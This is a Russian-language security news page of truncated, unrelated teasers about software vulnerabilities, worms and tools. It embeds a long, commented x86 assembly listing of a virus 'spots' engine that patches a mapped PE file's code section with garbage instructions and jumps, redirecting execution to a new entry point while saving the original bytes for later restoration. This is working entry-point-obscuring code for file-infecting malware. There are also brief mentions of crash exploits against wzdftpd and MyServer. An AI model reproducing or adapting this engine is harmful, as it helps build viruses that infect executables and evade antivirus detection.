DoS против wzdftpd
wzdftpd падает при передаче команды PORT без аргументов: $> telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to loca…
wzdftpd падает при передаче команды PORT без аргументов: $> telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to loca…
В гостевой книге MegaBook найдена пара уязвимостей:
Не так давно судья Фредерик Мотц своим постановлением обязал Microsoft включить виртуальную машину Java в состав операционны…
Уязвимость в управлении доступом обнаружена в VERITAS File System (VxFS) на Sun Solaris. Локальный пользователь может получ…
Переполнение буфера обнаружено в компоненте FTPServer/X от Mabry Software. Удаленный пользователь может аварийно завершить р…
Несколько уязвимостей обнаружено в системе управления покупками Comersus. Удаленный пользователь может просматривать базу да…
В Opera обнаружено множество уязвимостей.
GFI Software предлагает бесплатно просканировать вашу систему на наличие известных троянов. Для сканирования необходимо нали…
Очень удобная программа, которая покажет исходник любой формы на страничке в виде удобной структуры. Более того, программа в реальном времени позволяет изменять значения любых полей перед отправкой, даже скрытых(hidden) полей
Прога расставляет в сети виртуальные ловушки(honeypots).
Переполнение буфера обнаружено в GKrellM. Удаленный пользователь может выполнить произвольный код на системе. Сообща…
Уязвимость обнаружена в Simple Dynamic Finger Daemon (sdfingerd). Локальный пользователь может получить root привилегии.&nbs…
Microsoft выпустила патч, устраняющий уязвимость в компоненте nsiislog.dll в Windows Media Services и Microsoft Internet Inf…
Уязвимость обнаружена в tcptraceroute. Приложение не в состоянии понизить свои привилегии. Сообщается, что приложени…
Уязвимость раскрытия информации обнаружена в VisNetic MailServer в Web mail интерфейсе. Удаленный пользователь может просм…
Компания Symantec предупреждает о появлении нового сетевого червя W32.Mumu.B.Worm (хорошее название, не правда ли? :). Червь…
Небольшая утилитка для лечения компьютера от наиболее распространенных интернет-червей, на сегодняшней день программа способна очистить компьютер от следующих вирусов: Badtrans, BugBear, Nimda, Opas(aka Opasoft, Opaserv), Sircam, Sobig и Yaha(aka Lentin).
Отказ в обслуживании обнаружен в NGC Active MailServer. Удаленный пользователь может аварийно завершить работу почтового сер…
Уязвимость раскрытия информации обнаружена в файловой системе Linux /proc. Непривилегированный пользователь может читать сод…
Недостаток обнаружен в пути, которым элемент ActiveX управления обеспечивает доступ к информации на компьютере пользователя.…
Уязвимость обнаружена в ISAPI фильтре nsiislog.dll, используемом Microsoft Windows Media Services для регистрационных функци…
Программа для создания Flash и Gif анимации.
Антивирусные компании сообщают о небольшой вирусной эпидемии, которую вызвал вирус трехлетней давности. Причина, почему тако…
SQL инъекция обнаружена в ProFTPD при использовании Postgresql и mod_sql. Удаленный пользователь может войти в систему без а…
Target: Internet Maniac 1.2 Description: Tools for Internet Used tools: Ida Pro 3.8b, HIEW 6.11
Mark Litchfield, от имени NGSSoftware, сообщает о наличии уязвимости в утилите webadmin.exe, предназначенной для удалённого …
Уязвимость в проверке правильности ввода обнаружена в pMachine. Удаленный пользователь может выполнить XSS нападение. …
Переполнение буфера обнаружено в компоненте search.pl в Sambar Server. Удаленный пользователь может аварийно завершить работ…
Отказ в обслуживании обнаружен в Avaya Cajun P330/P130 и G700 Media Gateway. Удаленный пользователь может перезагрузить устр…
В свет вышла новая версия самого популярного DVD плеера - WinDVD Platinum 5.
Symantec Security выпущен бюллетень по безопасности, в котором констатируется наличие уязвимости в ActiveX-компоненте под на…
Переполнение буфера обнаружено в Microsoft Internet Explorer. Удаленный атакующий может аварийно завершить работу IE и возмо…
;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOTS GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; spots: ; Подпрограмма генерации ; пятен mov ecx,1 ; Кладём в ecx единицу ; call reset ; Подготавливаем данные call num_spots ; Генерируем случайное число ; это будет кол-во пятен tred: call save_bytes ; Сохраняем затираемы байты call gen_spot ; Генерируем пятно inc ecx ; Увеличиваем ecx на единицу cmp ecx,[ebp+n_spots] ; Все пятна сгенерированы jne tred ; Если нет, то генерируем call save_bytes ; Сохраняем последние байты call gen_final_spot ; И генерируем последнее ; пятно ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOT GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; gen_spot: ; Подпрограмма генерации ; одного пятна push eax ecx ; Сохраняем eax и ecx call len_sp_jmp ; Получаем случайную длину xchg eax,ebx ; прыжка пятна call testing ; Проверяем, чтобы пятно jc quit2 ; не выходило за кодовую ; секцию push ebx xor bx,bx dec bx mov ecx,[ebp+num1] ; Генерируем первую партию call garbage ; мусора pop ebx mov al,0e9h ; stosb ; mov eax,0 ; Генерируем jmp add eax,ebx ; add eax,ecx ; stosd ; push ebx xor bx,bx dec bx mov ecx,[ebp+num2] ; Генерируем вторую партию call garbage ; мусора pop ebx sub edi,[ebp+num2] ; add edi,[ebp+num1] ; Корректируем edi add edi,ebx ; quit2: pop ecx eax ; Восстанавливаем ecx и eax ret ; Возврат из подпрограммы ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; LAST SPOT GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; gen_final_spot: ; Подпрограмма генерации ; финального пятна push eax ecx ; Сохраняем eax и ecx jc not_big ; Если длина не превышает inc [ebp+n_spots] ; размера кодовой секции, то not_big: ; Увеличим кол-во пятен mov ecx,[ebp+num1] ; Генерируем мусорные call garbage ; инструкции push edi ; Сохраняем edi sub edi,[ebp+start_code] ; Подготавливаем длину jmp'a mov ebx,edi ; для последнего пятна pop edi ; Восстанавливаем edi mov al,0e9h ; stosb ; mov eax,0 ; sub eax,5 ; Генерируем финальное sub eax,ebx ; пятно add eax,[ebp+new_eip] ; sub eax,[ebp+old_eip] ; stosd ; mov ecx,[ebp+num2] ; Генерируем вторую партию call garbage ; мусорных инструкций pop ecx eax ; Восстанавливаем ecx и eax ret ; Возврат из подпрограммы ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOTS GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; ADDRESS OF SAVING BYTES -> EDI ; ; QUANTITY OF BYTES -> EBX ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; save_bytes: ; Подпрограмма сохранения ; заменяемых байт pusha ; Сохраняем всё в стэке call length1 ; Генерируем длины мусорных ; инструкций mov ebx,[ebp+num1] ; Помещаем в ebx первую add ebx,[ebp+num2] ; и вторую длины add ebx,5 ; Добавляем к ebx - 5 mov esi,edi ; Сохраняем в буфере с mov edi,[ebp+pointer] ; начала смещение в памяти mov eax,esi ; на сохраняемые байты stosd ; mov ecx,ebx ; После этого сохраняем в mov eax,ecx ; буфере кол-во сохраняемых stosd ; байт rep movsb ; И в самом конце сохраняем mov [ebp+pointer],edi ; в буфере сами байты ; popa ; Вынимаем всё из стека ret ; Возврат из подпрограммы ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; RESTORE SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; OLD ENTRY POINT -> EBX ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; restore: ; Подпрограмма ; восстановления сохранённых ; байт cld ; Поиск вперёд lea esi,[ebp+rest_bytes] ; В esi указазатель на буфер mov edx,1 ; В edx кладём - 1 not_enough: mov edi,[ebp+old_eip] ; В edi загружаем точку add edi,[ebp+image_base] ; входа mov ebx,edi ; Сохраняем edi в ebx lodsd ; В eax старое смещение ; байт в памяти sub eax,[ebp+start_code] ; Отнимаем смещение начала ; кода и добавляем add edi,eax ; точку входа lodsd ; Загружаем в eax кол-во mov ecx,eax ; байт и кладём их в ecx rep movsb ; Перемещаем оригинальные ; байты на старое место inc edx ; Переходим к следующему cmp edx,[ebp+n_spots] ; пятну jl not_enough ; если не все пятна вернули, ; то восстанавливаем дальше quit: ; ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; LENGTH SPOT GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; length1: ; Подпрограмма генерации ; длин мусорных инструкций mov eax,20 ; call brandom32 ; Генерируем случайное число test eax,eax ; в диапазоне 1..19 jz length1 ; mov [ebp+num1],eax ; Сохраняем его в переменную rand2: mov eax,20 ; call brandom32 ; Генерируем случайное число test eax,eax ; в диапазоне 1..19 jz rand2 ; mov [ebp+num2],eax ; Сохраняем его в вторую ; переменную ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; RESET SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; reset: ; Подпрограмма инициализации ; переменных mov edi,[ebp+start_code] ; ; push esi ; Инициализируем переменные lea esi,[ebp+rest_bytes] ; mov [ebp+pointer],esi ; pop esi ; ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOT JUMP LENGTH GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; LENGTH OF SPOT JUMP -> EAX ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; len_sp_jmp: ; Подпрограмма генерации ; длины прыжка mov eax,150 ; call brandom32 ; Генерируем случайное число cmp eax,45 ; в диапазоне 45..149 jle len_sp_jmp ; ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; SPOTS NUMBER GENERATION SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; NO OUTPUT IN SUBROUTINE ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; num_spots: ; Подпрограмма генерации ; количества пятен pusha ; Сохраняем всё в стеке mov eax,40 ; Генерируем случайное число call brandom32 ; в диапазоне 1..40 inc eax ; И сохраняем его в mov [ebp+n_spots],eax ; переменной popa ; Вынимаем всё из стэка ret ; Возврат из процедуры ;xxxxxxxxxxxxxxxxxxxxxxxxxx; ; TESTING SUBROUTINE ; ;--------------------------; ; [ IN ] ; ; ; ; NO INPUT IN SUBROUTINE ; ;--------------------------; ; [ OUT ] ; ; ; ; CARRY FLAG ; ;xxxxxxxxxxxxxxxxxxxxxxxxxx; testing: ; Подпрограмма проверки ; попадания в границу секции push edi eax ; Сохраняем edi eax в стэке add edi,[ebp+num1] ; Добавим к edi 1-ую длину ; мусорных инструкций add edi,[ebp+num2] ; После этого добавим 2-ую add edi,300 ; И добавим число в которое ; входит максимальный размер ; пятна + длина его прыжка mov eax,[ebp+size_for_spot] ; В eax загрузим размер ; места для пятен и смещение add eax,[ebp+start_code] ; в памяти точки входа cmp edi,eax ; Сравним eax и edi clc ; Сбросим carry флаг jl m_space ; Если edi меньше, то все ; хорошо mov [ebp+n_spots],ecx ; Если нет, то мы уменьшаем inc [ebp+n_spots] ; количество пятен и stc ; устанавливаем carry флаг m_space: pop eax edi ; Вынимаем eax и edi ret ; Возврат из процедуры ;--------------------------; pointer dd 0 ; n_spots dd 0 ; ; num1 dd 0 ; num2 dd 0 ; ; Данные необходимые для PE_header dd 0 ; работы мотора old_eip dd 0 ; image_base dd 0 ; start_code dd 0 ; new_eip dd 0 ; map_address dd 0 ; size_for_spot dd 0 ; rest_bytes: db 2100 dup (?) ; ;--------------------------; В качестве параметра данному мотору передаётся адрес файла в памяти (MapViewOfFile)
Примеры уязвимостей в XMB Forum:
MyServer 0.4.1 при GET запросе с 20-ю "//" безвозвратно валится. Есть эксплоит, вызывающий отказ в обслуживании (в…
Shut down, Reboot, Log off, Force restart или полное уничтожение любого приложения в Windows 2000 (даже kernel32.dll).
Компания Scansoft представила на суд общественности свою новую разработку, имитирующую человеческую речь. Публике был предст…
Уязвимость обнаружена в сервере Web приложений Java Enterprise User Solution (JEUS). Удаленный пользователь может выполнить …
Несколько уязвимостей обнаружено в Kerio MailServer. Удаленный авторизованный пользователь может выполнить произвольный код …
Уязвимость в проверке правильности ввода обнаружена в RSA SecurID ACE Agent. Удаленный пользователь может украсть секретную …